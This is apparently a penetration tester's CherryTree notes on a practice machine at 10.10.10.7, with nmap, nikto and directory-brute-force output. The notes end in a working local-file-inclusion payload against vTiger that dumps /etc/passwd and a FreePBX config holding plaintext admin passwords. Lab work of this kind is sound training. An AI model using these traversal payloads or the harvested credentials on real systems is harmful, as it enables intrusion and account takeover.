<?xml version="1.0" ?>
<cherrytree>
	<node custom_icon_id="0" foreground="" is_bold="False" name="Kioptrix" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587565077.42" ts_lastsave="1587565077.42" unique_id="38">
		<rich_text></rich_text>
		<node custom_icon_id="10" foreground="" is_bold="True" name="10.10.10.7" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1590777756.61" unique_id="39">
			<rich_text></rich_text>
			<node custom_icon_id="0" foreground="" is_bold="False" name="Setup" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587568434.39" ts_lastsave="1587568440.66" unique_id="83">
				<rich_text></rich_text>
				<node custom_icon_id="0" foreground="" is_bold="False" name="Alias" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587568479.92" ts_lastsave="1590145568.24" unique_id="84">
					<rich_text>export target=10.10.255.95
printenv
*
---
gedit /etc/hosts
add:
192.168.16.129 target</rich_text>
				</node>
			</node>
			<node custom_icon_id="21" foreground="" is_bold="False" name="Enumeration" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1492949452.72" unique_id="40">
				<rich_text></rich_text>
				<node custom_icon_id="18" foreground="" is_bold="False" name="TCP" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1492949819.41" ts_lastsave="1587583334.51" unique_id="41">
					<rich_text></rich_text>
					<node custom_icon_id="0" foreground="" is_bold="False" name="Ping Scan (Quick Sweep)" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587566370.19" ts_lastsave="1590778351.38" unique_id="80">
						<rich_text>ping target
PING 10.10.10.7 (10.10.10.7) 56(84) bytes of data.
64 bytes from 10.10.10.7: icmp_seq=1 ttl=63 time=29.5 ms
</rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="Service &amp; OS Scan" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587565364.18" ts_lastsave="1590778401.14" unique_id="76">
						<rich_text>nmap -A target
(-O for just OS, -sV for just service)
---
nmap -A 10.10.10.7
Starting Nmap 7.80 ( </rich_text>
						<rich_text link="webs https://nmap.org">https://nmap.org</rich_text>
						<rich_text> ) at 2020-05-29 14:43 EDT
Nmap scan report for 10.10.10.7
Host is up (0.036s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to </rich_text>
						<rich_text link="webs https://10.10.10.7/">https://10.10.10.7/</rich_text>
						<rich_text>
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: TOP USER UIDL RESP-CODES STLS AUTH-RESP-CODE IMPLEMENTATION(Cyrus POP3 server v2) APOP PIPELINING LOGIN-DELAY(0) EXPIRE(NEVER)
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: LIST-SUBSCRIBED ANNOTATEMORE NO ATOMIC RENAME IMAP4 OK UIDPLUS LISTEXT ID URLAUTHA0001 STARTTLS THREAD=REFERENCES X-NETSCAPE RIGHTS=kxte IMAP4rev1 IDLE QUOTA MAILBOX-REFERRALS SORT=MODSEQ CHILDREN SORT CONDSTORE Completed MULTIAPPEND ACL THREAD=ORDEREDSUBJECT BINARY NAMESPACE LITERAL+ UNSELECT CATENATE
443/tcp   open  ssl/https?
|_ssl-date: 2020-05-29T18:48:28+00:00; +1m55s from scanner time.
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4445/tcp  open  upnotifyp?                                                                    
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)                                      
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).                      
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com                                
                                                                                              
Host script results:                                                                          
|_clock-skew: 1m54s                                                                           
                                                                                              
Service detection performed. Please report any incorrect results at </rich_text>
						<rich_text link="webs https://nmap.org/submit/">https://nmap.org/submit/</rich_text>
						<rich_text> .
Nmap done: 1 IP address (1 host up) scanned in 349.35 seconds 
</rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="Full Scan" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587565540.94" ts_lastsave="1590778179.9" unique_id="79">
						<rich_text>nmap -p- -sV -sS -T4 target
---
</rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="Service Banners" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587565457.83" ts_lastsave="1590778472.67" unique_id="78">
						<rich_text>nmap -sV target
---

                                                    
Starting Nmap 7.80 ( </rich_text>
						<rich_text link="webs https://nmap.org">https://nmap.org</rich_text>
						<rich_text> ) at 2020-05-29 14:49 EDT                               
Nmap scan report for 10.10.10.7
Host is up (0.033s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
25/tcp    open  smtp       Postfix smtpd
80/tcp    open  http       Apache httpd 2.2.3
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
443/tcp   open  ssl/https?
993/tcp   open  ssl/imap   Cyrus imapd
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com

Service detection performed. Please report any incorrect results at </rich_text>
						<rich_text link="webs https://nmap.org/submit/">https://nmap.org/submit/</rich_text>
						<rich_text> .
Nmap done: 1 IP address (1 host up) scanned in 190.35 seconds
</rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="Reconnoitre" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587583334.51" ts_lastsave="1587583348.93" unique_id="89">
						<rich_text link="webs https://github.com/codingo/Reconnoitre" scale="h3">Reconnoitre</rich_text>
						<rich_text>
</rich_text>
						<rich_text justification="left"></rich_text>
						<codebox char_offset="12" frame_height="269" frame_width="475" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True"># Scan a single host, create file structure &amp; discover services
python reconnoitre.py -t 192.168.1.5 -o /root/Documents/labs/ --services

# Discover live hosts &amp; hostnames within a range
python reconnoitre.py -t 192.168.1.1-252 -o /root/Documents/testing/ --pingsweep --hostnames
    
# Discover live hosts within a range and then do a quick probe for services
python reconnoitre.py -t 192.168.1.1-252 -o /root/Documents/testing/ --pingsweep --services --quick    
    
# Discover live hosts w/in a range &amp; probe all ports (tcp &amp; udp) for services
python reconnoitre.py -t 192.168.1.1-252 -o /root/Documents/testing/ --pingsweep --services</codebox>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="Vuln Scan" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587565374.96" ts_lastsave="1590780806.62" unique_id="77">
						<rich_text>nmap -Pn --script vuln,nmap-vulners,vulscan target
---
sudo nmap -Pn --script vuln 10.10.10.7                    
Starting Nmap 7.80 ( </rich_text>
						<rich_text link="webs https://nmap.org">https://nmap.org</rich_text>
						<rich_text> ) at 2020-05-29 14:56 EDT                               
Nmap scan report for target (10.10.10.7)                                                      
Host is up (0.035s latency).                                                                  
Not shown: 988 closed ports                                                                   
PORT      STATE SERVICE                                                                       
22/tcp    open  ssh
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
25/tcp    open  smtp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
|_sslv2-drown: 
80/tcp    open  http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /icons/: Potentially interesting directory w/ listing on 'apache/2.2.3 (centos)'
|_http-passwd: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       </rich_text>
						<rich_text link="webs https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750</rich_text>
						<rich_text>
|_      </rich_text>
						<rich_text link="webs http://ha.ckers.org/slowloris/">http://ha.ckers.org/slowloris/</rich_text>
						<rich_text>
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
110/tcp   open  pop3
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
111/tcp   open  rpcbind
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
143/tcp   open  imap
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
443/tcp   open  https
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       </rich_text>
						<rich_text link="webs https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750</rich_text>
						<rich_text>
|_      </rich_text>
						<rich_text link="webs http://ha.ckers.org/slowloris/">http://ha.ckers.org/slowloris/</rich_text>
						<rich_text>
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
| ssl-ccs-injection: 
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the &quot;CCS Injection&quot; vulnerability.
|           
|     References:
|       </rich_text>
						<rich_text link="webs http://www.cvedetails.com/cve/2014-0224">http://www.cvedetails.com/cve/2014-0224</rich_text>
						<rich_text>
|       </rich_text>
						<rich_text link="webs http://www.openssl.org/news/secadv_20140605.txt">http://www.openssl.org/news/secadv_20140605.txt</rich_text>
						<rich_text>
|_      </rich_text>
						<rich_text link="webs https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224</rich_text>
						<rich_text>
| ssl-dh-params: 
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_DES_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: mod_ssl 2.2.x/1024-bit MODP group with safe prime modulus
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      </rich_text>
						<rich_text link="webs https://weakdh.org">https://weakdh.org</rich_text>
						<rich_text>
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  BID:70574  CVE:CVE-2014-3566
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the &quot;POODLE&quot; issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       </rich_text>
						<rich_text link="webs https://www.openssl.org/~bodo/ssl-poodle.pdf">https://www.openssl.org/~bodo/ssl-poodle.pdf</rich_text>
						<rich_text>
|       </rich_text>
						<rich_text link="webs https://www.imperialviolet.org/2014/10/14/poodle.html">https://www.imperialviolet.org/2014/10/14/poodle.html</rich_text>
						<rich_text>
|       </rich_text>
						<rich_text link="webs https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566</rich_text>
						<rich_text>
|_      </rich_text>
						<rich_text link="webs https://www.securityfocus.com/bid/70574">https://www.securityfocus.com/bid/70574</rich_text>
						<rich_text>
|_sslv2-drown: 
993/tcp   open  imaps
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown: 
995/tcp   open  pop3s
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown: 
3306/tcp  open  mysql
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
4445/tcp  open  upnotifyp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
10000/tcp open  snet-sensor-mgmt
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-vuln-cve2006-3392: 
|   VULNERABLE:
|   Webmin File Disclosure
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2006-3392
|       Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.
|       This allows arbitrary files to be read, without requiring authentication, using &quot;..%01&quot; sequences
|       to bypass the removal of &quot;../&quot; directory traversal sequences.
|       
|     Disclosure date: 2006-06-29
|     References:
|       </rich_text>
						<rich_text link="webs http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure">http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure</rich_text>
						<rich_text>
|       </rich_text>
						<rich_text link="webs https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392</rich_text>
						<rich_text>
|_      </rich_text>
						<rich_text link="webs http://www.exploit-db.com/exploits/1997/">http://www.exploit-db.com/exploits/1997/</rich_text>
						<rich_text>
| ssl-ccs-injection: 
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the &quot;CCS Injection&quot; vulnerability.
|           
|     References:
|       </rich_text>
						<rich_text link="webs http://www.cvedetails.com/cve/2014-0224">http://www.cvedetails.com/cve/2014-0224</rich_text>
						<rich_text>
|       </rich_text>
						<rich_text link="webs http://www.openssl.org/news/secadv_20140605.txt">http://www.openssl.org/news/secadv_20140605.txt</rich_text>
						<rich_text>
|_      </rich_text>
						<rich_text link="webs https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224</rich_text>
						<rich_text>
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  BID:70574  CVE:CVE-2014-3566
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the &quot;POODLE&quot; issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       </rich_text>
						<rich_text link="webs https://www.openssl.org/~bodo/ssl-poodle.pdf">https://www.openssl.org/~bodo/ssl-poodle.pdf</rich_text>
						<rich_text>
|       </rich_text>
						<rich_text link="webs https://www.imperialviolet.org/2014/10/14/poodle.html">https://www.imperialviolet.org/2014/10/14/poodle.html</rich_text>
						<rich_text>
|       </rich_text>
						<rich_text link="webs https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566</rich_text>
						<rich_text>
|_      </rich_text>
						<rich_text link="webs https://www.securityfocus.com/bid/70574">https://www.securityfocus.com/bid/70574</rich_text>
						<rich_text>
|_sslv2-drown: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 441.86 seconds
</rich_text>
					</node>
				</node>
				<node custom_icon_id="18" foreground="" is_bold="False" name="UDP" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1492949826.2" ts_lastsave="1587566901.16" unique_id="42">
					<rich_text></rich_text>
					<node custom_icon_id="0" foreground="" is_bold="False" name="UDP Scan" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587566901.16" ts_lastsave="1590155072.91" unique_id="81">
						<rich_text>nmap -sU target
---
[sudo] password for user: 
Starting Nmap 7.80 ( </rich_text>
						<rich_text link="webs https://nmap.org">https://nmap.org</rich_text>
						<rich_text> ) at 2020-05-22 08:00 EDT
Stats: 0:07:21 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 46.55% done; ETC: 08:16 (0:08:28 remaining)
Nmap scan report for 10.10.255.95
Host is up (0.21s latency).
Not shown: 997 closed ports
PORT    STATE         SERVICE
68/udp  open|filtered dhcpc
137/udp open          netbios-ns
138/udp open|filtered netbios-dgm

Nmap done: 1 IP address (1 host up) scanned in 1000.95 seconds
</rich_text>
					</node>
				</node>
				<node custom_icon_id="17" foreground="" is_bold="False" name="Web Services" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1590777966.97" unique_id="43">
					<rich_text></rich_text>
					<node custom_icon_id="18" foreground="" is_bold="False" name="WhatWeb (profile)" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1500473692.93" ts_lastsave="1590778600.73" unique_id="46">
						<rich_text>whatweb target
---
whatweb target
</rich_text>
						<rich_text link="webs http://target">http://target</rich_text>
						<rich_text> [302 Found] Apache[2.2.3], Country[RESERVED][ZZ], HTTPServer[CentOS][Apache/2.2.3 (CentOS)], IP[10.10.10.7], RedirectLocation[</rich_text>
						<rich_text link="webs https://target/],">https://target/],</rich_text>
						<rich_text> Title[302 Found]
ERROR Opening: </rich_text>
						<rich_text link="webs https://target/">https://target/</rich_text>
						<rich_text> - SSL_connect returned=1 errno=0 state=error: dh key too small
</rich_text>
					</node>
					<node custom_icon_id="18" foreground="" is_bold="False" name="Nikto" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1492949545.74" ts_lastsave="1590779561.07" unique_id="44">
						<rich_text>nikto -h target -p 80,443
---
- Nikto v2.1.6
---------------------------------------------------------------------------
+ No web server found on target:443
---------------------------------------------------------------------------
+ Target IP:          10.10.10.7
+ Target Hostname:    target
+ Target Port:        80
+ Start Time:         2020-05-29 14:56:53 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.3 (CentOS)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: </rich_text>
						<rich_text link="webs https://target/">https://target/</rich_text>
						<rich_text>
+ Apache/2.2.3 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 884871, size: 4872, mtime: Thu Jun 24 15:46:08 2010
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8494 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2020-05-29 15:06:30 (GMT-4) (577 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
</rich_text>
					</node>
					<node custom_icon_id="18" foreground="" is_bold="False" name="Dirb\DirBuster" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1492949554.24" ts_lastsave="1590782538.51" unique_id="45">
						<rich_text>dirb -r </rich_text>
						<rich_text link="webs http://target">http://target</rich_text>
						<rich_text> /usr/share/dirb/wordlists/big.txt
---
/admin
/icons/
/mailman/admin/
/pipermail/
/mailman/confirm/
/configs/
/help
/images
/lang
/libs
/mail
/modules
/panel
/recordings
/robots.txt
/static
/themes
/var
/vtigercrm

/admin
Running FreePBX 2.8.1.4

/vtigercrm
Running vTiger 5
</rich_text>
						<rich_text link="webs https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00">https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00</rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="gobuster" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1590146587.26" ts_lastsave="1590778662.61" unique_id="91">
						<rich_text>gobuster dir -u </rich_text>
						<rich_text link="webs http://&lt;ip&gt;:3333">http://target:3333</rich_text>
						<rich_text> -w /usr/share/dirb/wordlists/big.txt
gobuster dir -u </rich_text>
						<rich_text link="webs http://10.10.255.95:3333">http://10.10.255.95:3333</rich_text>
						<rich_text> -w dirbuster/directory-list-2.3-medium.txt
/usr/share/wordlists has many lists
---
</rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="LFI" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587583115.16" ts_lastsave="1590786692.09" unique_id="88">
						<rich_text link="webs https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00">https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00</rich_text>
						<rich_text>


root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash distcache:x:94:94:Distcache:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash dbus:x:81:81:System message bus:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin spamfilter:x:500:500::/home/spamfilter:/bin/bash haldaemon:x:68:68:HAL daemon:/:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin fanis:x:501:501::/home/fanis:/bin/bash 
---
</rich_text>
						<rich_text link="webs https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00">https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/ampportal.conf%00</rich_text>
						<rich_text>

# This file is part of FreePBX. # # FreePBX is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 2 of the License, or # (at your option) any later version. # # FreePBX is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with FreePBX. If not, see . # # This file contains settings for components of the Asterisk Management Portal # Spaces are not allowed! # Run /usr/src/AMP/apply_conf.sh after making changes to this file # FreePBX Database configuration # AMPDBHOST: Hostname where the FreePBX database resides # AMPDBENGINE: Engine hosting the FreePBX database (e.g. mysql) # AMPDBNAME: Name of the FreePBX database (e.g. asterisk) # AMPDBUSER: Username used to connect to the FreePBX database # AMPDBPASS: Password for AMPDBUSER (above) # AMPENGINE: Telephony backend engine (e.g. asterisk) # AMPMGRUSER: Username to access the Asterisk Manager Interface # AMPMGRPASS: Password for AMPMGRUSER # AMPDBHOST=localhost AMPDBENGINE=mysql # AMPDBNAME=asterisk AMPDBUSER=asteriskuser # AMPDBPASS=amp109 AMPDBPASS=jEhdIekWmdjE AMPENGINE=asterisk AMPMGRUSER=admin #AMPMGRPASS=amp111 AMPMGRPASS=jEhdIekWmdjE # AMPBIN: Location of the FreePBX command line scripts # AMPSBIN: Location of (root) command line scripts # AMPBIN=/var/lib/asterisk/bin AMPSBIN=/usr/local/sbin # AMPWEBROOT: Path to Apache's webroot (leave off trailing slash) # AMPCGIBIN: Path to Apache's cgi-bin dir (leave off trailing slash) # AMPWEBADDRESS: The IP address or host name used to access the AMP web admin # AMPWEBROOT=/var/www/html AMPCGIBIN=/var/www/cgi-bin # AMPWEBADDRESS=x.x.x.x|hostname # FOPWEBROOT: Path to the Flash Operator Panel webroot (leave off trailing slash) # FOPPASSWORD: Password for performing transfers and hangups in the Flash Operator Panel # FOPRUN: Set to true if you want FOP started by freepbx_engine (amportal_start), false otherwise # FOPDISABLE: Set to true to disable FOP in interface and retrieve_conf. Useful for sqlite3 # or if you don't want FOP. # #FOPRUN=true FOPWEBROOT=/var/www/html/panel #FOPPASSWORD=passw0rd FOPPASSWORD=jEhdIekWmdjE # FOPSORT=extension|lastname # DEFAULT VALUE: extension # FOP should sort extensions by Last Name [lastname] or by Extension [extension] # This is the default admin name used to allow an administrator to login to ARI bypassing all security. # Change this to whatever you want, don't forget to change the ARI_ADMIN_PASSWORD as well ARI_ADMIN_USERNAME=admin # This is the default admin password to allow an administrator to login to ARI bypassing all security. # Change this to a secure password. ARI_ADMIN_PASSWORD=jEhdIekWmdjE # AUTHTYPE=database|none # Authentication type to use for web admininstration. If type set to 'database', the primary # AMP admin credentials will be the AMPDBUSER/AMPDBPASS above. AUTHTYPE=database # AMPADMINLOGO=filename # Defines the logo that is to be displayed at the TOP RIGHT of the admin screen. This enables # you to customize the look of the administration screen. # NOTE: images need to be saved in the ..../admin/images directory of your AMP install # This image should be 55px in height AMPADMINLOGO=logo.png # USECATEGORIES=true|false # DEFAULT VALUE: true # Controls if the menu items in the admin interface are sorted by category (true), or sorted # alphabetically with no categories shown (false). # AMPEXTENSIONS=extensions|deviceanduser # Sets the extension behavior in FreePBX. If set to 'extensions', Devices and Users are # administered together as a unified Extension, and appear on a single page. # If set to 'deviceanduser', Devices and Users will be administered seperately. Devices (e.g. # each individual line on a SIP phone) and Users (e.g. '101') will be configured # independent of each other, allowing association of one User to many Devices, or allowing # Users to login and logout of Devices. AMPEXTENSIONS=extensions # ENABLECW=true|false ENABLECW=no # DEFAULT VALUE: true # Enable call waiting by default when an extension is created. Set to 'no' to if you don't want # phones to be commissioned with call waiting already enabled. The user would then be required # to dial the CW feature code (*70 default) to enable their phone. Most installations should leave # this alone. It allows multi-line phones to receive multiple calls on their line appearances. # CWINUSEBUSY=true|false # DEFAULT VALUE: true # For 